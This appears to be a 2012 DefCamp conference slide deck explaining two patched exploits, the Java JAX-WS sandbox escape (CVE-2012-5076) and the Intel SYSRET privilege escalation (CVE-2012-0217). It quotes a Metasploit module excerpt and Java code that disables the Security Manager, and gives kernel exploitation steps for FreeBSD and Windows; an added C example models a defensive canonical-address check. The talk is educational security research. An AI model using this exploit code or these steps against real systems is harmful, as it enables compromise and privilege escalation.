How does a 0day work? - DefCamp 2012

  • 1. How does a 0day work? – Ionut Gabriel Popescu “Nytro”, DefCamp 2012
  • 2. Contents
    1. Why?
    2. CVE-2012-5076
    3. CVE-2012-0217
    4. Questions?
  • 3. Why learn how 0days work?
    - Not so many interested people
    - A very interesting subject
    - Unlimited possibilities: Windows/Linux, Java…
    - Highly technical skills
    - Deep understanding of “internals”
    - Don’t be a script kiddie – Metasploit?
    - Not so complicated at all
  • 4. Java Applet JAX-WS Remote Code Execution – CVE-2012-5076
    Disclosure: 16 Oct 2012
    Discovered by: Unknown
    Oracle patch: October 2012
    Exploited: November 2012
    Java: Version 7 update 7 (7u7)
    Quickly included by: BlackHole, Nuclear Pack, RedKit…
    Metasploit module: juan vazquez
    Also known as: Java drive-by
  • 5. Browser Java applets can NOT:
    - Access the filesystem
    - Access the system clipboard
    - Transfer data from another server
    - Load native libraries
    - Change the Security Manager
    - Create a Class Loader
    - Read certain system properties
    Source: -
  • 6. Exploit – Metasploit. Is this 1337?
  • 7. Metasploit module (excerpt):

        ##
        # This file is part of the Metasploit Framework and may be subject to
        # redistribution and commercial restrictions. Please see the Metasploit
        # web site for more information on licensing and terms of use.
        ##

        require 'msf/core'
        require 'rex'

        class Metasploit3 < Msf::Exploit::Remote
          Rank = ExcellentRanking

          include Msf::Exploit::Remote::HttpServer::HTML
          include Msf::Exploit::Remote::BrowserAutopwn

          autopwn_info({ :javascript => false })

          def initialize( info = {} )
            super( update_info( info,
              'Name'        => 'Java Applet JAX-WS Remote Code Execution',
              'Description' => %q{
                This module abuses the JAX-WS classes from a Java Applet to run arbitrary Java
                code outside of the sandbox as exploited in the wild in November of 2012. The
                vulnerability affects Java version 7u7 and earlier.
              },
              'License'     => MSF_LICENSE,
              'Author'      =>
                [
                  'Unknown',       # Vulnerability Discovery
                  'juan vazquez'   # metasploit module
                ]
              ...
  • 8. Exploit source

        paths = [
          [ "Exploit.class" ],
          [ "MyPayload.class" ]
        ]

        p = regenerate_payload(cli)
        jar = p.encoded_jar

    Links:
    - 2012-5076/
    - 2012-5076/
  • 9. Cool parts

        import;
        import;

        GenericConstructor genericconstructor = new GenericConstructor(Object.class,
            "sun.invoke.anon.AnonymousClassLoader", new Class[0]);
        Object obj = genericconstructor.create(new Object[] {});
        Method method = ManagedObjectManagerFactory.getMethod(obj.getClass(), "loadClass",
            new Class[] { byte[].class });
        Class class1 = (Class)method.invoke(obj, new Object[] {
            //byte_payload buffer
        });
        class1.newInstance();
        //System.out.println("SecurityManager:" + System.getSecurityManager());
        //class1.getMethod("r", new Class[0]).invoke(class1, new Object[0]);
        Payload.main(null);
        //Runtime.getRuntime().exec("calc.exe");

        public MyPayload() {
            AccessController.doPrivileged(this);
        }

        public Object run() throws Exception {
            System.setSecurityManager(null);
            return null;
        }
  • 10. Classes and methods
    - GenericConstructor
    - GenericConstructor.create
    - sun.invoke.anon.AnonymousClassLoader
    - sun.invoke.anon.AnonymousClassLoader.loadClass
    - ManagedObjectManagerFactory
    - ManagedObjectManagerFactory.getMethod
    - Method
    - Method.invoke
    - Class
    - Class.newInstance
    - Payload.main(null);
  • 11. How does this 0day work?
    0. Abuse of “GenericConstructor” and “ManagedObjectManagerFactory”
       - “GenericConstructor” and “ManagedObjectManagerFactory” – bypass the Java security model
    1. Create an instance of “sun.invoke.anon.AnonymousClassLoader”
       - “sun.invoke.anon.AnonymousClassLoader” – restricted, privileged
    2. Call the “loadClass” method of “sun.invoke.anon.AnonymousClassLoader”
       - “loadClass” – loads a class from a byte[] stream
    3. Call the default constructor of our class, loaded using “AnonymousClassLoader”
       - Since it is called from privileged code, it will run privileged and disable the Security Manager
    4. Enjoy
       - Do whatever you want
  • 12. Questions?
  • 13. Intel SYSRET privilege escalation – CVE-2012-0217
    Discovered by: Rafal Wojtczuk
    Disclosed: 12 April 2012
    Patched: 12 June 2012
    Affected operating systems:
    - FreeBSD
    - Windows 7
    - Linux (NO – CVE-2006-0744 – DoS)
    Only 64-bit systems are vulnerable
    Complicated, tricky
    Only Intel x64 processors
  • 14. Intro x64
    Registers extended to 64 bits: RAX, RBX… RIP, RSP
    - AH/AL = 1 byte, AX = 2 bytes, EAX = 4 bytes, RAX = 8 bytes
    New general purpose registers:
    - R8, R9, R10, R11, R12, R13, R14, R15
    New calling convention:
    - RCX – 1st argument
    - RDX – 2nd argument
    - R8 – 3rd argument
    - R9 – 4th argument
    - Still requires stack space to be reserved
    Windows x64 replaced fs with gs – TIB (Thread Information Block)
  • 15. Why?
    - Because of the “sysret” instruction
    - Older system calls – very slow: interrupts (e.g. int 0x80)
    - Interrupts need to use the IDT (Interrupt Dispatch Table)
    - AMD: syscall/sysret, Intel: sysenter/sysexit (saves RIP in RCX)
    - Intel follows the AMD 64 standard (not exactly)
    - Just 48 bits are used (not all 64) = 256 TB of memory available
    - Must use canonical addresses (bits 48-63 == bit 47)
    - A #GP (General Protection) fault is raised for a non-canonical RIP
    - On exception, the exception record is pushed on the stack: error code, saved RIP, CS, RFLAGS, RSP, SS
    - The usermode stack is changed to the kernel mode stack – the “safe” one
    - If RSP is invalid, #DF (double fault) is raised
  • 16. Privileges
    - Main purpose: full privileges (no limitations)
    - Rings: 0, 1, 2, 3 – because the segment descriptor DPL is 2 bits
    - Windows and Linux use just 0 and 3 (compatibility)
    - Low privilege to high privilege: system calls
    - Change from usermode to kernel mode with syscall and back:
      1. RIP is in usermode, RSP is in usermode, syscall
      2. RIP – kernel mode, RSP – usermode (replaced during the system call), sysret
  • 17. How does this 0day work?
    - What can happen during sysret: interrupts, exceptions
    - Interrupts are not blocked, but are forbidden (one MSR)
    - How about exceptions? #GP
    - On AMD, #GP is not raised for a non-canonical address in RCX (safe)
    - On Intel, if we can get RIP to a non-canonical address before sysret (how depends on the OS), #GP will be raised
    - #GP is raised while the CPU is in privileged mode
    - Use RSP to overwrite a kernel structure to execute code with ring0 privileges
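To make the canonical-address rule from slide 15 and the sysret hazard from slide 17 concrete, here is an added C example; it is my own illustration, not code from the talk or from any operating system. It assumes 48 implemented virtual-address bits, as the slides state, and models the check a kernel's syscall-return path has to make on Intel: sysret loads RIP from RCX without validating it, so the kernel itself must test the return address for canonicality and take the slower iret path when the test fails (iret validates the target RIP before it switches stacks, so the fault it raises is handled on the kernel stack). That fallback is a standard mitigation the slides do not describe. The functions `is_canonical`, `return_rip_after_syscall` and `choose_return_path` are names of my own; the sample input is the boundary address from slide 18, where a two-byte syscall placed at (1 << 47) - 2 returns to exactly 1 << 47, the first non-canonical address.

```c
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>

/* Implemented virtual-address bits on the x64 parts the talk discusses (slide 15: 48 of 64). */
#define VA_BITS 48

/* Size of the resulting virtual address space in TiB: 2^48 bytes = 256 TiB (slide 15). */
uint64_t va_space_tib(void)
{
    return ((uint64_t)1 << VA_BITS) >> 40;
}

/* An address is canonical when bits 63..47 are all equal to bit 47
 * (slide 15: "bits 48-63 == bit 47"): the top 17 bits are either all 0
 * (user half) or all 1 (kernel half). Anything else is non-canonical,
 * and loading it into RIP raises #GP. */
bool is_canonical(uint64_t addr)
{
    uint64_t top = addr >> (VA_BITS - 1);              /* bits 63..47 */
    uint64_t all_ones = UINT64_MAX >> (VA_BITS - 1);   /* 0x1FFFF */
    return top == 0 || top == all_ones;
}

/* First address above the user half, i.e. the lowest non-canonical address. */
uint64_t lowest_noncanonical(void)
{
    return (uint64_t)1 << (VA_BITS - 1);               /* 0x0000800000000000 */
}

/* The syscall instruction is two bytes (0x0f 0x05, slide 18), so the address
 * the kernel will later return to is the one immediately after it. */
uint64_t return_rip_after_syscall(uint64_t syscall_addr)
{
    return syscall_addr + 2;
}

/* Hypothetical model of a hardened syscall-return path (not any kernel's real
 * code). On Intel, sysret does not check RCX: a non-canonical RIP raises #GP
 * while the CPU is still in ring 0 but with the user-controlled RSP already
 * loaded, which is the condition slide 17 describes. Returning with iret
 * instead keeps the fault on the kernel stack. */
enum return_path { RETURN_SYSRET, RETURN_IRET };

enum return_path choose_return_path(uint64_t user_rip)
{
    return is_canonical(user_rip) ? RETURN_SYSRET : RETURN_IRET;
}

int main(void)
{
    /* Constructed sample: the boundary case from slide 18. */
    uint64_t syscall_addr = ((uint64_t)1 << 47) - 2;
    uint64_t rip = return_rip_after_syscall(syscall_addr);

    printf("address space: %llu TiB\n", (unsigned long long)va_space_tib());
    printf("syscall at 0x%016llx returns to 0x%016llx, canonical=%d, path=%s\n",
           (unsigned long long)syscall_addr, (unsigned long long)rip,
           (int)is_canonical(rip),
           choose_return_path(rip) == RETURN_SYSRET ? "sysret" : "iret");
    return 0;
}
```

The check is cheap (one shift and two compares), which is why it can sit on the hot system-call return path; only the rare non-canonical case pays for the slower iret exit.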
  • 18. Operating system specific
    FreeBSD:
    1. Place a “syscall” (0x0f, 0x05) right before a non-canonical address ((1 << 47) - 2)
    2. Set RSP to a calculated value to make sure the exception record pushed on the stack will overwrite the #PF (Page Fault) handler’s “target” offset with a pointer to our kernel mode payload
    3. #PF will be raised (because gs is usermode) and will execute our payload
    4. Recover the overwritten IDT entries to avoid a triple fault (machine reboot)
    Windows:
    1. Create a UMS scheduled thread (EnterUmsSchedulingMode)
    2. Set RIP and RSP from the TEB (Thread Environment Block) to a non-canonical address
    3. Create a new thread that continuously overwrites the return address on the #GP stack after it is written but before it is read (after the function call)
    Enjoy!
  • 19. Questions?